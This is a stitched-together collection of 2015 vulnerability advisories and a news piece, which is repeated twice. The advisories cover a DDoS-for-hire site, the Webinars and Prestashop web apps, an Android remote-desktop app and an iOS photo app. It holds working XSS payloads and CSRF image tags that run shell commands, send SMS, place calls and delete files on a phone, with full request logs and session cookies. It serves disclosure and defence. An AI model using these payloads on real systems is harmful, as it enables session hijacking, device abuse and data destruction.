(servername) 1.4 The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can also be observed by man-in-the-middle attacks in the local network. Vulnerable Module(s): [+] dasboard > user settings > change password 1.5 The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers). Vulnerable Module(s): [+] dasboard > user settings > change password Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= 1.1 --- PoC Session Logs [POST] (Injection) --- Status: 200[OK] POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer [http://lizardstresser.su/usercp] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] POST-Daten: cpassword[chaos666] npassword[http%3A%2F %2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe] rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe] updatePassBtn[Change+Stored+Data%21] Response Header: Date[Tue, 20 Jan 2015 10:29:21 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Server[cloudflare-nginx] CF-RAY[1aba972a06dd15b3-FRA] Content-Encoding[gzip] - Status: 302[Moved Temporarily] POST https://lizardstresser.su/register.php Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://lizardstresser.su/register.php] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] POST-Daten: username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2] password[chaos666] rpassword[chaos666] email[research%40vulnerbaility-lab.com] ref[%2F] checkbox1[1] register[Register] Response Header: Server[cloudflare-nginx] Date[Tue, 20 Jan 2015 11:20:02 GMT] Content-Type[text/html] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Location[/purchase] CF-RAY[1abae168238f15b3-FRA] X-Firefox-Spdy[3.1] Reference(s): http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe https://lizardstresser.su/register.php 1.2 --- PoC Session Logs [POST] (Injection) --- Status: 200[OK] POST http://lizardstresser.su/ajax/addticket.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://lizardstresser.su/tickets] Content-Length[324] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp] Response Header: Date[Tue, 20 Jan 2015 10:30:54 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Server[cloudflare-nginx] CF-RAY[1aba996d3d7115b3-FRA] Content-Encoding[gzip] Reference(s): http://lizardstresser.su/ajax/addticket.php Credits & Authors: ================== Vulnerability Laboratory [Research Team] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

Document Title: =============== Webinars v2.2.26.0 - Client Side Cross Site Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1412 Release Date: ============= 2015-01-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1412 Common Vulnerability Scoring System: ==================================== 2.4 Product & Service Introduction: =============================== http://www.webinars.com Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the Webinars v2.2.26.0 conference web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting vulnerability has been discovered in the official InterCall Webinar v2.2.26.0 conference web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin session data by client-side cross site requests. The vulnerability is located in the `meeting_id` value of the `viewer.php` file. Remote attackers are able to inject malicious script codes to client-side web-application requests. Remote attackers uses a validation error in the viewer.php file to execute client-side script code in the webinar web-application context. The client-side script code execution occurs in the same file after a site refresh. The attack vector is located on the client-side of the service and the request method to inject the script code is `GET`. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4. Exploitation of the client-side remote vulnerability requires low or medium user interaction and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and client-side manipulation of affected and connected module web context. Vulnerable Service(s): [+] Webinars Vulnerable File(s): [+] viewer.php Vulnerable Parameter(s): [+] meeting_id Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged applicaiton user account and low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- PoC Session Logs [GET] --- GET /viewer.php?meeting_id=%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E HTTP/1.1 Host: webinars.snm.org - User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - HTTP/1.1 200 OK Date: Fri, 16 Jan 2015 18:10:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Content-Length: 3044 Connection: close Content-Type: text/html; charset=UTF-8 PoC: Webinar <body > <div id='message_box' class='message' style='visibility:hidden'> <div class='box_header'><a onclick="ShowMessage(false, ''); return false;" href='javascript:void(0)'> [ X ]</a></div> <p id='message_text'> </p> </div> <div id='page_box' class='page' style='visibility:hidden'> <div class='box_header'><a onclick="ShowPageBox(false); return false;" href='javascript:void(0)'> [ X ]</a></div> <iframe id='page_content' src=''></iframe> </div> <div id='sharing_box' class='page' style='visibility:hidden'> <div class='box_header'><a onclick="ShowSharingBox(false); return false;" href='javascript:void(0)'> [ X ]</a></div> <iframe id='sharing_content' src=''></iframe>[CLIENT-SIDE SCRIPT CODE EXECUTION!] </div> <div id="flashcontent"> <object id="viewer" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100%" height="100%"> <param name="flashvars" value="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" /> <param name="movie" value="viewer.swf?1719627766" /> <param name="swliveconnect" value="true" /> <param name="wmode" value="opaque" /> <param name="allowScriptAccess" value="always" /> <param name="allowFullScreen" value="true" /> <object data="viewer.swf?1719627766" flashvars="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" width="100%" height="100%" swliveconnect=true name="viewer" wmode="opaque" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash"> <div class="noflash"> <p>You need the latest version of the Adobe Flash Player.<p/> <p><a target=_blank href="https://www.adobe.com/go/getflashplayer"><img src="https://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p> </div> </object> </object> </div> </body> Reference(s): http://localhost:80/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://www.xxx.com/meet/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://webinar.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://webinars.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable `meeting_id` value in the viewer.php file. Restrict the input and disallow special chars and parse the output to prevent an execution of client-side injected script codes. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the webinar conference application is estimated as medium. (CVSS 2.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Webinars 2.2.26.0 Script Insertion ? Packet Storm

Document Title: =============== Remote Desktop v0.9.4 Android - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1413 Release Date: ============= 2015-01-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1413 Common Vulnerability Scoring System: ==================================== 4.4 Product & Service Introduction: =============================== Remote Desktop brings order to your Droid. View and retrieve all the contents of your phone such as documents, photos, videos. All you need is a standard web browser (! the latest Chrome or Firefox !) and Remote Desktop will allow you interact with your phone as easily as a PC. (Copy of the Homepage: http://remote-desktop.android.informer.com/0.9.4/ & https://play.google.com/store/apps/details?id=pl.androiddev.mobiletab ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Remote Desktop v0.9.4 Android mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Damian Kolakowski Product: Remote Desktop - Android Mobile Web Application 0.9.4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple vulnerabilities has been discovered in the Remote Desktop v0.9.4 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. 1.1 The local command injection vulnerability is located in `cmd` value of the `/api/sms` file. The remote attackers performs a client-side request and manipulates the `cmd` value to compromise the web-app by a local command injection. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.5. Exploitation of the command/path inject vulnerability requires no privileged android device user account or user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile android application and the connected device. Request Method(s): [+] [GET] Vulnerable Module(s): [+] /api/sms Vulnerable Parameter(s): [+] cmd=%3Cform%20action=api/[x]?cmd= 1.2 The cross site request forgery vulnerabilities are located in the `shell`,`sms`,`calllogs` and `files` sections of the android app. Remote attackers are able prepare special crafted URLs that executes client-side requests to execute application functions (delete,add, call, send). The requst method to execute a function in a client-side request is GET. The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4. Exploitation of the client-side web vulnerability requires no privileged web-application user account but medium or high user interaction. Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected module context. Request Method(s): [+] [GET] Vulnerable Parameter(s): [+] shell [+] sms [+] calllogs Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. [REMOTE SHELL CODE EXECUTE VULNERABILI! CSRF ] <img src="http://localhost:8080/api/shell?cmd=execute&command=id&token=111111111111" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/shell?cmd=execute&command=id&token=111111111111 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK","working-directory":"\/","stderr":"","stdout":"uid=10257(u0_a257) gid=10257(u0_a257) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)\n"} Send SMS <img src="http://localhost:8080/api/sms?cmd=send&token=111111111111&to=333&message=HELLO " width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/sms?cmd=send&token=111111111111&to=333&message=HELLO HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421469722760 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK","results":[{"id":1590,"address":"333"}], "thread":{"id":51,"read":false,"snippet":"HELLO","recipients_snippet":"333", "message_count":70,"date":1421476972278,"recipients":[{"id":51,"address":"333"}]}} Call Phone <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/calllogs?cmd=make_call&number=0674086422 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Delete File <img src="http://localhost:8080/api/files?cmd=delete&sep=/&path=/file" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/files?cmd=delete&sep=/&path=%2Fstorage%2Femmc%2FRWDFv5.9.5.apk HTTP/1.1 Host: 192.168.1.6:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/index.html?nocache=1421449820153 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Call Phone <img src="http://localhost:8080/api/calllogs?cmd=make_call&number=0674086422" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /api/calllogs?cmd=make_call&number=11111111111 HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} Delete all SMS <img src="http://localhost:8080/api/sms?cmd=delete_all" width="0" height="0" border="0"> GET /api/sms?cmd=delete_all HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.3:8080/index.html?nocache=1421465315931 Connection: keep-alive - Response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"OK"} LOCAL COMMAND INJECTION VULNERABILITY shell?, sms?, calllogs?files? --- PoC Session Logs [GET] (Execution) --- GET /api/sms?cmd=%3Cform%20action=api/sms?cmd=[LOCAL COMMAND INJECTION VULNERABILITY!] HTTP/1.1 Host: 192.168.1.3:8080 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - Response {"response":"OK"} HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 {"response":"Unknown command: [LOCAL COMMAND INJECTION VULNERABILITY!]"} Reference: http://localhost:8080/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Remote Desktop 0.9.4 Android CSRF / Command Injection ? Packet Storm

CVE-2015-1175-xss-prestashop Information ——————– Advisory by Octogence. Name: Reflected XSS Vulnerability in prestashop ecommerce software Affected Software : Prestashop Affected Versions: 1.6.0.9 and possibly below Vendor Homepage : https://www.prestashop.com/ Vulnerability Type : Cross-site Scripting Severity : High CVE ID: CVE-2015-1175 Impact —— An attacker can craft a URL with malicious JavaScript code which executes in the browser. Technical Details —————– Sample URL: http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300 Parameter: layered_price_slider Sample Payload: <img src=a onerror=alert(1)> For more information on cross-site scripting vulnerabilities read the following article: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) Advisory Timeline (mm/dd/yyyy) ——————– 01/07/2015 – Reported 01/12/2015 – Vulnerability Fixed 01/18/2015 – Advisory Released http://octogence.com/advisories/cve-2015-1175-xss-prestashop/ Regards Sudhanshu Octogence Tech Solutions Noida, India Mobile | +91-9971658929 Website| www.octogence.com Source : Prestashop 1.6.0.9 Cross Site Scripting ? Packet Storm

A critical vulnerability discovered in Verizon's FiOS mobile application allowed an attacker to access the email account of any Verizon customer with relative ease, leaving almost five million user accounts of Verizon's FiOS application at risk. The FiOS API flaw was discovered by XDA senior software developer Randy Westergren on January 14, 2015, when he found that it was possible to not only read the contents of other users' inboxes, but also send message on their behalf. The issue was discovered while analyzing traffic generated by the Android version of My FiOS, which is used for account management, email and scheduling video recordings. Westergren took time to put together a proof-of-concept showing serious cause for concern, and then reported it to Verizon. The telecom giant acknowledged the researcher of the notification the same day and issued a fix on Friday, just two days after the vulnerability was disclosed. That's precisely how it should be done - quickly and efficiently. Microsoft could learn a lot more from Verizon, as Microsoft wasn't able to fix the security flaws in its software reported by Google’s Project Zero team even after a three-month-long time period provided to the company. One-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 were disclosed by Google’s security team before Microsoft planned to patch them. The FiOS API flaw, actually contained in the application’s API, allowed any account to be accessed by manipulating user identification numbers in web requests, giving attackers ability to read individual messages from a person’s Verizon inbox. According to the security researcher, the vulnerability even allowed attackers to send email messages from victims’ accounts and found and exploited further vulnerable API calls. "It was my suspicion that all of the API methods for this widget within the app were vulnerable. My last test was sending an outgoing message as another user [which was] also successful," Westergren wrote. The problem has been fixed by the telecom giant, so there is no need for users to worry about it. Verizon rewarded Westergren with a year's worth of free internet. "Version's (corporate) security group seemed to immediately realize the impact of this vulnerability and took it very seriously," Westergren said. Source

A critical vulnerability discovered in Verizon's FiOS mobile application allowed an attacker to access the email account of any Verizon customer with relative ease, leaving almost five million user accounts of Verizon's FiOS application at risk. The FiOS API flaw was discovered by XDA senior software developer Randy Westergren on January 14, 2015, when he found that it was possible to not only read the contents of other users' inboxes, but also send message on their behalf. The issue was discovered while analyzing traffic generated by the Android version of My FiOS, which is used for account management, email and scheduling video recordings. Westergren took time to put together a proof-of-concept showing serious cause for concern, and then reported it to Verizon. The telecom giant acknowledged the researcher of the notification the same day and issued a fix on Friday, just two days after the vulnerability was disclosed. That's precisely how it should be done - quickly and efficiently. Microsoft could learn a lot more from Verizon, as Microsoft wasn't able to fix the security flaws in its software reported by Google’s Project Zero team even after a three-month-long time period provided to the company. One-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 were disclosed by Google’s security team before Microsoft planned to patch them. The FiOS API flaw, actually contained in the application’s API, allowed any account to be accessed by manipulating user identification numbers in web requests, giving attackers ability to read individual messages from a person’s Verizon inbox. According to the security researcher, the vulnerability even allowed attackers to send email messages from victims’ accounts and found and exploited further vulnerable API calls. "It was my suspicion that all of the API methods for this widget within the app were vulnerable. My last test was sending an outgoing message as another user [which was] also successful," Westergren wrote. The problem has been fixed by the telecom giant, so there is no need for users to worry about it. Verizon rewarded Westergren with a year's worth of free internet. "Version's (corporate) security group seemed to immediately realize the impact of this vulnerability and took it very seriously," Westergren said. Source.

Document Title: =============== VeryPhoto v3.0 iOS - Command Injection Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1401 Release Date: ============= 2015-01-13 Vulnerability Laboratory ID (VL-ID): ==================================== 1401 Common Vulnerability Scoring System: ==================================== 5.6 Product & Service Introduction: =============================== VeryPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos, while giving you an unprecedented user experience. No in-app purchase, no functional limitations. album password - effectively protect your privacy. multi-touch browsing - Personalized operation allows you to have a different user experience. professional photo editing features - lets you easily have a professional-grade graphics processing technology. (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a local command inject web vulnerability in the official VeryPhoto v3.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Cheng Chen Product: VeryPhoto - iOS Web Application (WiFi) 3.0 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A local command inject web vulnerability has been discovered in the official VeryPhoto v3.0 iOS mobile web-application. The vulnerability allows remote attackers to inject own commands by usage of stored manipulated system/device values to compromise the apple mobile iOS application. The command inject vulnerability is located in the vulnerable `albumname` value of the `HTTP Wifi Server`. Local attackers are able to inject own malicious system specific commands or path value requests by usage of the vulnerable `albumname` value. The execution of the command occurs in the `VeryPhoto - File Dir Index Listing` of the http wifi interface application. Attackers are able to manipulate the local albumname values by of the iOS default photo app by rename to execute the commands. The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. Local attackers are also able to exploit the albumname validation issue in combination with persistent injected script codes. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application and the connected device components. Request Method(s): [+] [Sync] Vulnerable Module(s): [+] Album Vulnerable Parameter(s): [+] albumname Affected Module(s): [+] VeryPhoto - File Dir Index Listing (http://localhost:8080/) Proof of Concept (PoC): ======================= The local command inject web vulnerability can be exploited by local attackers (network) without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the VeryPhoto Pro Album v3.0 iOS application 